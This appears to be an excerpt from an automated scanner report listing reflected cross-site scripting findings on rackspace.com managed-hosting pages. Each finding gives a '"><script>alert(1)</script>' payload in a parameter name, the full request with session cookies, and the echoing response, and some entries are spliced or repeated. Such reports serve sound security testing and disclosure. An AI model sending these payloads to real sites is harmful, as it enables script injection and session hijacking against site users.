<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/dedicated_servers.php?52935"><script>alert(1)</script>6e41b61991=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.159. http://www.rackspace.com/managed_hosting/ecommerce/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/ecommerce/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37f9"><script>alert(1)</script>699687afa84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/ecommerce/index.php?f37f9"><script>alert(1)</script>699687afa84=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/ecommerce/index.php?f37f9"><script>alert(1)</script>699687afa84=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.160. http://www.rackspace.com/managed_hosting/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c4f8"><script>alert(1)</script>3846902dc87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/index.php?5c4f8"><script>alert(1)</script>3846902dc87=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
4.161. http://www.rackspace.com/managed_hosting/managed_colocation/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/managed_colocation/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d220"><script>alert(1)</script>98f69d8e3cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/managed_colocation/index.php?2d220"><script>alert(1)</script>98f69d8e3cf=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... _chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/managed_colocation/index.php?2d220"><script>alert(1)</script>98f69d8e3cf=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.162. http://www.rackspace.com/managed_hosting/private_cloud/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/private_cloud/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7dbf"><script>alert(1)</script>cc934d41c56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/private_cloud/index.php?f7dbf"><script>alert(1)</script>cc934d41c56=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/private_cloud/index.php?f7dbf"><script>alert(1)</script>cc934d41c56=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return fal ...[SNIP]...
4.163. http://www.rackspace.com/managed_hosting/richmedia/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/richmedia/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764d0"><script>alert(1)</script>1bd771bb9f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/richmedia/index.php?764d0"><script>alert(1)</script>1bd771bb9f6=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/richmedia/index.php?764d0"><script>alert(1)</script>1bd771bb9f6=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return fal ...[SNIP]...
4.164. http://www.rackspace.com/managed_hosting/saas/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/saas/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67034"><script>alert(1)</script>f7308fd8519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/saas/index.php?67034"><script>alert(1)</script>f7308fd8519=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/saas/index.php?67034"><script>alert(1)</script>f7308fd8519=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.165. http://www.rackspace.com/managed_hosting/services/database/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/services/database/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3c9"><script>alert(1)</script>f4dd8f3841d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/database/index.php?ff3c9"><script>alert(1)</script>f4dd8f3841d=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/database/index.php?ff3c9"><script>alert(1)</script>f4dd8f3841d=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.166. http://www.rackspace.com/managed_hosting/services/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/services/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7830c"><script>alert(1)</script>662736478fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/index.php?7830c"><script>alert(1)</script>662736478fa=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e97"><script>alert(1)</script>796d58113c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/proservices/criticalsites.php?42e97"><script>alert(1)</script>796d58113c8=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... on('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/proservices/criticalsites.php?42e97"><script>alert(1)</script>796d58113c8=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.168. http://www.rackspace.com/managed_hosting/services/proservices/disasterrecovery.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c1d4"><script>alert(1)</script>ec9df87e08c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php?5c1d4"><script>alert(1)</script>ec9df87e08c=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22c4c"><script>alert(1)</script>ce8be8e7e0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/proservices/sharepoint.php?22c4c"><script>alert(1)</script>ce8be8e7e0a=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; 